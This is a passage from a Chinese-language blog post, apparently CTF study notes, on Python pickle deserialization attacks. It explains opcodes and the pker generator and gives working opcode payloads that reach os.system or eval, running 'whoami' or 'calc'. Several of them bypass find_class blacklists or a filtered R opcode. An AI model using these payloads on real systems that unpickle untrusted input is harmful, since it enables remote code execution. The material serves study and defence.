<td>选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数</td>
<td>R</td>
<td>函数和参数出栈，函数的返回值入栈</td>
<td>无</td>
</tr>
<tr>
<td>.</td>
<td>程序结束，栈顶的一个元素作为pickle.loads()的返回值</td>
<td>.</td>
<td>无</td>
<td>无</td>
</tr>
<tr>
<td>(</td>
<td>向栈中压入一个MARK标记</td>
<td>(</td>
<td>MARK标记入栈</td>
<td>无</td>
</tr>
<tr>
<td>t</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为元组</td>
<td>t</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>)</td>
<td>向栈中直接压入一个空元组</td>
<td>)</td>
<td>空元组入栈</td>
<td>无</td>
</tr>
<tr>
<td>l</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为列表</td>
<td>l</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>]</td>
<td>向栈中直接压入一个空列表</td>
<td>]</td>
<td>空列表入栈</td>
<td>无</td>
</tr>
<tr>
<td>d</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）</td>
<td>d</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>}</td>
<td>向栈中直接压入一个空字典</td>
<td>}</td>
<td>空字典入栈</td>
<td>无</td>
</tr>
<tr>
<td>p</td>
<td>将栈顶对象储存至memo_n</td>
<td>pn\n</td>
<td>无</td>
<td>对象被储存</td>
</tr>
<tr>
<td>g</td>
<td>将memo_n的对象压栈</td>
<td>gn\n</td>
<td>对象被压栈</td>
<td>无</td>
</tr>
<tr>
<td>0</td>
<td>丢弃栈顶对象</td>
<td>0</td>
<td>栈顶对象被丢弃</td>
<td>无</td>
</tr>
<tr>
<td>b</td>
<td>使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置</td>
<td>b</td>
<td>栈上第一个元素出栈</td>
<td>无</td>
</tr>
<tr>
<td>s</td>
<td>将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中</td>
<td>s</td>
<td>第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新</td>
<td>无</td>
</tr>
<tr>
<td>u</td>
<td>寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中</td>
<td>u</td>
<td>MARK标记以及被组合的数据出栈，字典被更新</td>
<td>无</td>
</tr>
<tr>
<td>a</td>
<td>将栈的第一个元素append到第二个元素(列表)中</td>
<td>a</td>
<td>栈顶元素出栈，第二个元素（列表）被更新</td>
<td>无</td>
</tr>
<tr>
<td>e</td>
<td>寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中</td>
<td>e</td>
<td>MARK标记以及被组合的数据出栈，列表被更新</td>
<td>无</td>
</tr>
</tbody></table>
<p>需要注意的地方：</p>
<ul>
<li><code>c</code>操作符会尝试<code>import</code>库，所以在<code>pickle.loads</code>时不需要漏洞代码中先引入系统库</li>
</ul>
<p><strong>如何拼接opcode：</strong><br>将第一个pickle流结尾表示结束的<code>.</code>去掉，将第二个pickle流与第一个拼接起来即可。</p>
<h5 id="利用pker工具"><a href="#利用pker工具" class="headerlink" title="利用pker工具"></a>利用pker工具</h5><p>注意：最好在能够手写opcode的情况下使用pker进行辅助编写，不要过分依赖pker</p>
<ul>
<li><p>pker是由@eddieivan01编写的以仿照Python的形式产生pickle opcode的解析器，可以在<a target="_blank" rel="noopener" href="https://github.com/eddieivan01/pker%E4%B8%8B%E8%BD%BD%E6%BA%90%E7%A0%81%E3%80%82%E8%A7%A3%E6%9E%90%E5%99%A8%E7%9A%84%E5%8E%9F%E7%90%86%E8%A7%81%E4%BD%9C%E8%80%85%E7%9A%84paper%EF%BC%9A[%E9%80%9A%E8%BF%87AST%E6%9D%A5%E6%9E%84%E9%80%A0Pickle">https://github.com/eddieivan01/pker下载源码。解析器的原理见作者的paper：[通过AST来构造Pickle</a> opcode](<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7012)%E3%80%82">https://xz.aliyun.com/t/7012)。</a></p>
</li>
<li><p>使用pker，可以很方便地编写<code>pickle opcode</code>（<strong>生成pickle版本0的opcode</strong>）。</p>
</li>
<li><p>pker的实现用到了python的ast（抽象语法树）库</p>
</li>
</ul>
<p><strong>pker可以实现的功能：</strong></p>
<ul>
<li>变量赋值：存在memo中，保存memo下标和变量名即可</li>
<li>函数调用</li>
<li>类型字面量构造</li>
<li>List和dict成员修改</li>
<li>对象成员变量修改</li>
</ul>
<p>具体来讲，可以使用pker进行原变量覆盖、函数执行、实例化新的对象。</p>
<h6 id="pker工具的使用方法"><a href="#pker工具的使用方法" class="headerlink" title="pker工具的使用方法"></a>pker工具的使用方法</h6><ol>
<li>pker中的针对pickle的特殊语法需要重点掌握（后文给出示例）</li>
<li>此外我们需要注意一点：python中的所有类、模块、包、属性等都是对象，这样便于对各操作进行理解。</li>
<li>pker主要用到<code>GLOBAL、INST、OBJ</code>三种特殊的函数以及一些必要的转换方式，其他的opcode也可以手动使用：</li>
</ol>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">一下module都可以是包含`.`的子module</span><br><span class="line">调用函数时，注意传入的参数类型要和示例一致</span><br><span class="line">对应的opcode会被生成，但并不与pker代码相互等价</span><br><span class="line"></span><br><span class="line">GLOBAL</span><br><span class="line">对应opcode：b&#x27;c&#x27;</span><br><span class="line">huoqu1module下的一个全局对象（没有import的也可以，比如下面的os）：</span><br><span class="line">GLOBAL(&#x27;os&#x27;, &#x27;system&#x27;)</span><br><span class="line">输入：module,instance(callable、module都是instance)  </span><br><span class="line"></span><br><span class="line">INST</span><br><span class="line">对应opcode：b&#x27;i&#x27;</span><br><span class="line">建立并入栈一个对象（可以执行一个函数）：</span><br><span class="line">INST(&#x27;os&#x27;, &#x27;system&#x27;, &#x27;ls&#x27;)  </span><br><span class="line">输入：module,callable,para </span><br><span class="line"></span><br><span class="line">OBJ</span><br><span class="line">对应opcode：b&#x27;o&#x27;</span><br><span class="line">建立并入栈一个对象（传入的第一个参数为callable，可以执行一个函数））：</span><br><span class="line">OBJ(GLOBAL(&#x27;os&#x27;, &#x27;system&#x27;), &#x27;ls&#x27;) </span><br><span class="line">输入：callable,para</span><br><span class="line"></span><br><span class="line">xxx(xx,...)</span><br><span class="line">对应opcode：b&#x27;R&#x27;</span><br><span class="line">使用参数xx调用函数xxx（先将函数入栈，再将参数入栈并调用） //应该即是reduce方法</span><br><span class="line"></span><br><span class="line">li[0]=321</span><br><span class="line">或</span><br><span class="line">globals_dic[&#x27;local_var&#x27;]=&#x27;hello&#x27;</span><br><span class="line">对应opcode：b&#x27;s&#x27;</span><br><span class="line">更新列表或字典的某项的值</span><br><span class="line"></span><br><span class="line">xx.attr=123</span><br><span class="line">对应opcode：b&#x27;b&#x27;</span><br><span class="line">对xx对象进行属性设置</span><br><span class="line"></span><br><span class="line">return</span><br><span class="line">对应opcode：b&#x27;0&#x27;</span><br><span class="line">出栈（作为pickle.loads函数的返回值）：</span><br><span class="line">return xxx # 注意，一次只能返回一个对象或不返回对象（就算用逗号隔开，最后也只返回一个元组）</span><br></pre></td></tr></table></figure>

<p>注意：</p>
<ol>
<li>由于opcode本身的功能问题，pker肯定也不支持列表索引、字典索引、点号取对象属性作为<strong>左值</strong>，需要索引时只能先获取相应的函数（如<code>getattr</code>、<code>dict.get</code>）才能进行。但是因为存在<code>s</code>、<code>u</code>、<code>b</code>操作符，<strong>作为右值是可以的</strong>。即“查值不行，赋值可以”。</li>
<li>pker解析<code>S</code>时，用单引号包裹字符串。所以pker代码中的双引号会被解析为单引号opcode:</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">test=&quot;123&quot;</span><br><span class="line">return test</span><br></pre></td></tr></table></figure>

<p>被解析为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b&quot;S&#x27;123&#x27;\np0\n0g0\n.&quot;</span><br></pre></td></tr></table></figure>

<h6 id="pker：函数执行"><a href="#pker：函数执行" class="headerlink" title="pker：函数执行"></a>pker：函数执行</h6><ul>
<li>通过<code>b&#39;R&#39;</code>调用：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">s=&#x27;whoami&#x27;</span><br><span class="line">system = GLOBAL(&#x27;os&#x27;, &#x27;system&#x27;)</span><br><span class="line">system(s) # `b&#x27;R&#x27;`调用</span><br><span class="line">return</span><br></pre></td></tr></table></figure>

<ul>
<li>通过<code>b&#39;i&#39;</code>调用：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INST(&#x27;os&#x27;, &#x27;system&#x27;, &#x27;whoami&#x27;)</span><br></pre></td></tr></table></figure>

<ul>
<li>通过<code>b&#39;c&#39;</code>与<code>b&#39;o&#39;</code>调用：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">OBJ(GLOBAL(&#x27;os&#x27;, &#x27;system&#x27;), &#x27;whoami&#x27;)</span><br></pre></td></tr></table></figure>

<ul>
<li>多参数调用函数</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">INST(&#x27;[module]&#x27;, &#x27;[callable]&#x27;[, par0,par1...])</span><br><span class="line">OBJ(GLOBAL(&#x27;[module]&#x27;, &#x27;[callable]&#x27;)[, par0,par1...])</span><br></pre></td></tr></table></figure>

<p>等如变量覆盖参考指定的文章，遇到题再学</p>
<h6 id="如何自动化构造"><a href="#如何自动化构造" class="headerlink" title="如何自动化构造"></a>如何自动化构造</h6><p>文章已经将得比较清楚了，这里稍微说说，体会一下思想：</p>
<p>如下方式利用：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ cat test/code_breaking</span><br><span class="line"><span class="built_in">getattr</span> = GLOBAL(<span class="string">&#x27;builtins&#x27;</span>, <span class="string">&#x27;getattr&#x27;</span>)</span><br><span class="line"><span class="built_in">dict</span> = GLOBAL(<span class="string">&#x27;builtins&#x27;</span>, <span class="string">&#x27;dict&#x27;</span>)</span><br><span class="line">dict_get = <span class="built_in">getattr</span>(<span class="built_in">dict</span>, <span class="string">&#x27;get&#x27;</span>)</span><br><span class="line"><span class="built_in">globals</span> = GLOBAL(<span class="string">&#x27;builtins&#x27;</span>, <span class="string">&#x27;globals&#x27;</span>)</span><br><span class="line">builtins = <span class="built_in">globals</span>()</span><br><span class="line">__builtins__ = dict_get(builtins, <span class="string">&#x27;__builtins__&#x27;</span>)</span><br><span class="line"><span class="built_in">eval</span> = <span class="built_in">getattr</span>(__builtins__, <span class="string">&#x27;eval&#x27;</span>)</span><br><span class="line"><span class="built_in">eval</span>(<span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span>)</span><br><span class="line"><span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">$ python3 pker.py &lt; test/code_breaking</span><br><span class="line"><span class="string">b&#x27;cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS\&#x27;get\&#x27;\ntRp2\n0cbuiltins\nglobals\np3\n0g3\n(tRp4\n0g2\n(g4\nS\&#x27;__builtins__\&#x27;\ntRp5\n0g0\n(g5\nS\&#x27;eval\&#x27;\ntRp6\n0g6\n(S\&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)\&#x27;\ntR.&#x27;</span></span><br></pre></td></tr></table></figure>



<h5 id="对opcode的利用"><a href="#对opcode的利用" class="headerlink" title="对opcode的利用"></a>对opcode的利用</h5><h6 id="绕过find-class函数"><a href="#绕过find-class函数" class="headerlink" title="绕过find_class函数"></a>绕过find_class函数</h6><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/14061?time__1311=mqmx9DBG0Qi=oGNDQiiQGkf=6ERiKd4D&alichlgref=https://cn.bing.com/">参考文章</a></p>
<p>上面在对find_class函数说明的时候，已经可以知道一般防护都是在find_class函数上做文章，那么现在稍微说说是如何绕过的：</p>
<p>比如如下限制：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">RestrictedUnpickler</span>(pickle.Unpickler):</span><br><span class="line">    blacklist = &#123;<span class="string">&#x27;eval&#x27;</span>, <span class="string">&#x27;exec&#x27;</span>, <span class="string">&#x27;execfile&#x27;</span>, <span class="string">&#x27;compile&#x27;</span>, <span class="string">&#x27;open&#x27;</span>, <span class="string">&#x27;input&#x27;</span>, <span class="string">&#x27;__import__&#x27;</span>, <span class="string">&#x27;exit&#x27;</span>&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">find_class</span>(<span class="params">self, module, name</span>):</span><br><span class="line">        <span class="comment"># Only allow safe classes from builtins.</span></span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">&quot;builtins&quot;</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span> self.blacklist:</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">getattr</span>(builtins, name)</span><br><span class="line">        <span class="comment"># Forbid everything else.</span></span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">&quot;global &#x27;%s.%s&#x27; is forbidden&quot;</span> %</span><br><span class="line">                                     (module, name))</span><br></pre></td></tr></table></figure>

<p>可以对应简单绕过的函数绕过，案例可以尝试使用函数绕过，还是可以看看。</p>
<p><strong>思路一 获取危险函数</strong></p>
<p>和SSTI和沙箱逃逸的思路类似,可以通过构造类对象链调用某些方法中含有危险函数的类实现绕过.我们只需要构造形如<code>builtins.getattr(builtins,&quot;eval&quot;)(command)</code>的payload即可实现绕过</p>
<ul>
<li>利用<code>sys.module</code>获取危险函数</li>
</ul>
<p><code>sys.module</code>是一个全局字典，这个知识点会在学习沙箱逃逸的时候重点学习..<code>sys.modules</code>这个字典的键是模块名,值是模块本身.所以我们可以通过<code>get(sys.modules,&quot;moduleName&quot;)</code>的方法获取危险模块.</p>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getattr(builtins.dict,&quot;get&quot;)(sys.modules,&quot;os&quot;).system(&quot;whoami&quot;)</span><br></pre></td></tr></table></figure>

<p>给pker的输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">getattr</span>=GLOBAL(<span class="string">&#x27;builtins&#x27;</span>,<span class="string">&#x27;getattr&#x27;</span>)</span><br><span class="line"><span class="built_in">dict</span>=GLOBAL(<span class="string">&#x27;builtins&#x27;</span>,<span class="string">&#x27;dict&#x27;</span>)</span><br><span class="line">get=<span class="built_in">getattr</span>(<span class="built_in">dict</span>,<span class="string">&#x27;get&#x27;</span>)</span><br><span class="line">mod=GLOBAL(<span class="string">&#x27;sys&#x27;</span>,<span class="string">&#x27;modules&#x27;</span>)</span><br><span class="line">os=get(mod,<span class="string">&#x27;os&#x27;</span>)</span><br><span class="line">system=<span class="built_in">getattr</span>(os,<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">system(<span class="string">&quot;whoami&quot;</span>)</span><br><span class="line"><span class="keyword">return</span></span><br></pre></td></tr></table></figure>

<p>用pker写成opcode</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">opcode=<span class="string">b&quot;cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS&#x27;get&#x27;\ntRp2\n0csys\nmodules\np3\n0g2\n(g3\nS&#x27;os&#x27;\ntRp4\n0g0\n(g4\nS&#x27;system&#x27;\ntRp5\n0g5\n(S&#x27;whoami&#x27;\ntR.&quot;</span></span><br></pre></td></tr></table></figure>



<ul>
<li><h6 id="利用builtins-globals-获取危险函数"><a href="#利用builtins-globals-获取危险函数" class="headerlink" title="利用builtins.globals()获取危险函数."></a>利用<code>builtins.globals()</code>获取危险函数.</h6></li>
</ul>
<p>还可以用builtins的<code>globals()</code>方法获取危险函数.<code>globals()</code>方法返回一个字典</p>
<blockquote>
<p>返回的字典包含了所有全局作用域内的名称（键）及其对应的值（值）.这个字典反映了当前模块全局命名空间的状态</p>
</blockquote>
<p>其中固然也包含了一些危险模块.</p>
<p>pker的输入：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">globa1=GLOBAL(<span class="string">&quot;builtins&quot;</span>,<span class="string">&quot;globals&quot;</span>)</span><br><span class="line">glob=globa1()</span><br><span class="line"><span class="built_in">dict</span>=GLOBAL(<span class="string">&quot;builtins&quot;</span>,<span class="string">&quot;dict&quot;</span>)</span><br><span class="line"><span class="built_in">getattr</span>=GLOBAL(<span class="string">&quot;builtins&quot;</span>,<span class="string">&quot;getattr&quot;</span>)</span><br><span class="line">get=<span class="built_in">getattr</span>(<span class="built_in">dict</span>,<span class="string">&quot;get&quot;</span>)</span><br><span class="line">builtins=get(glob,<span class="string">&quot;__builtins__&quot;</span>)</span><br><span class="line"><span class="built_in">eval</span>=<span class="built_in">getattr</span>(builtins,<span class="string">&quot;eval&quot;</span>)</span><br><span class="line"><span class="built_in">eval</span>(<span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span>)</span><br><span class="line"><span class="keyword">return</span></span><br></pre></td></tr></table></figure>

<p>生成的opcode</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">output=<span class="string">b&#x27;cbuiltins\nglobals\np0\n0g0\n(tRp1\n0cbuiltins\ndict\np2\n0cbuiltins\ngetattr\np3\n0g3\n(g2\nS\&#x27;get\&#x27;\ntRp4\n0g4\n(g1\nS\&#x27;__builtins__\&#x27;\ntRp5\n0g3\n(g5\nS\&#x27;eval\&#x27;\ntRp6\n0g6\n(S\&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)\&#x27;\ntR.&#x27;</span></span><br></pre></td></tr></table></figure>

<p><code>R</code>操作符被过滤时,可以使用如下payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">opcode=<span class="string">b&#x27;\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__(&quot;os&quot;).system(&quot;calc&quot;)o00.</span></span><br></pre></td></tr></table></figure>



<ul>
<li>还有未知模块的payload:</li>
</ul>
<p>如下payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">opcode=<span class="string">b&#x27;&#x27;&#x27;cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">p0                    #取到 getattr</span></span><br><span class="line"><span class="string">(cbuiltins</span></span><br><span class="line"><span class="string">dict</span></span><br><span class="line"><span class="string">S&#x27;get&#x27;</span></span><br><span class="line"><span class="string">tRp1</span></span><br><span class="line"><span class="string">cbuiltins</span></span><br><span class="line"><span class="string">globals</span></span><br><span class="line"><span class="string">)Rp2                  # getattr(dict, &#x27;get&#x27;)</span></span><br><span class="line"><span class="string">00g1</span></span><br><span class="line"><span class="string">(g2</span></span><br><span class="line"><span class="string">S&#x27;__builtins__&#x27;       # get(__import__(&#x27;builtins&#x27;).globals(), &#x27;__builtins__&#x27;)</span></span><br><span class="line"><span class="string">tRp3</span></span><br><span class="line"><span class="string">0g0</span></span><br><span class="line"><span class="string">(g3</span></span><br><span class="line"><span class="string">S&#x27;eval&#x27;</span></span><br><span class="line"><span class="string">tR(S&#x27;__import__(&quot;os&quot;).system(&quot;calc&quot;)&#x27;    # 取到 eval 然后实现 RCE</span></span><br><span class="line"><span class="string">tR.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>同时限制R指令时可以使用下面的payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">opcode=<span class="string">b&#x27;\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__(&quot;os&quot;).system(&quot;whoami&quot;)o00.&#x27;</span></span><br><span class="line"><span class="comment">#最后两个0是栈为空，否则会报错</span></span><br></pre></td></tr></table></figure>

<p>在pycharm上测试不知道为啥whami可以执行，但是就是不能执行dir（后面有题再测试一下）</p>
<h6 id="R指令被过滤"><a href="#R指令被过滤" class="headerlink" title="R指令被过滤"></a>R指令被过滤</h6><p>除了<code>o</code>、<code>i</code>，还可以使用<code>b</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">BUILD          = <span class="string">b&#x27;b&#x27;</span>   <span class="comment"># call __setstate__ or __dict__.update()</span></span><br></pre></td></tr></table></figure>

<p>代码跟进<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11807?time__1311=mqmx0DBD90qWqGNqeeqBKfdLAAh2x7Kx&alichlgref=https://cn.bing.com/">参考文章</a></p>
<p>利用示例如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Person</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self,age</span>):</span><br><span class="line">        self.age=age</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">opcode=<span class="string">b&#x27;&#x27;&#x27;(c__main__</span></span><br><span class="line"><span class="string">Person</span></span><br><span class="line"><span class="string">I18</span></span><br><span class="line"><span class="string">o&#125;(S&quot;__setstate__&quot;</span></span><br><span class="line"><span class="string">cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">ubS&quot;calc&quot;</span></span><br><span class="line"><span class="string">b.&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">p=pickle.loads(opcode)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h6 id="利用python内置函数绕过"><a href="#利用python内置函数绕过" class="headerlink" title="利用python内置函数绕过"></a>利用python内置函数绕过</h6><p>题目参考 <strong>美团CTF 2022 ezpickle</strong> 和 蓝帽杯2022 file_session和HITB Python_revenge writeup</p>
<p>可以利用map函数和filter函数</p>
<p>注意这两个函数都返回一个迭代器,所以我们需要使用<code>list()</code>函数将其变为一个列表输出.</p>
<p>payload如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">map</span>(<span class="built_in">eval</span>,[<span class="built_in">__import__</span>(<span class="string">&quot;os&quot;</span>).system(<span class="string">&quot;whoami&quot;</span>)])</span><br><span class="line"><span class="built_in">list</span>(<span class="built_in">map</span>(<span class="built_in">eval</span>,[<span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span>]))</span><br></pre></td></tr></table></figure>

<p>opcode如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">opcode=<span class="string">b&#x27;&#x27;&#x27;c__builtin__</span></span><br><span class="line"><span class="string">map</span></span><br><span class="line"><span class="string">p0</span></span><br><span class="line"><span class="string">0(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tp1</span></span><br><span class="line"><span class="string">0(cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">g1</span></span><br><span class="line"><span class="string">tp2</span></span><br><span class="line"><span class="string">0g0</span></span><br><span class="line"><span class="string">g2</span></span><br><span class="line"><span class="string">\x81p3</span></span><br><span class="line"><span class="string">0c__builtin__</span></span><br><span class="line"><span class="string">tuple</span></span><br><span class="line"><span class="string">p4</span></span><br><span class="line"><span class="string">(g3</span></span><br><span class="line"><span class="string">t\x81.&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>还有</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">opcode=<span class="string">b&#x27;&#x27;&#x27;c__builtin__</span></span><br><span class="line"><span class="string">map</span></span><br><span class="line"><span class="string">p0</span></span><br><span class="line"><span class="string">0(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tp1</span></span><br><span class="line"><span class="string">0(cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">g1</span></span><br><span class="line"><span class="string">tp2</span></span><br><span class="line"><span class="string">0g0</span></span><br><span class="line"><span class="string">g2</span></span><br><span class="line"><span class="string">\x81p3</span></span><br><span class="line"><span class="string">0c__builtin__</span></span><br><span class="line"><span class="string">bytes</span></span><br><span class="line"><span class="string">p4</span></span><br><span class="line"><span class="string">(g3</span></span><br><span class="line"><span class="string">t\x81.&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Fupanc
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
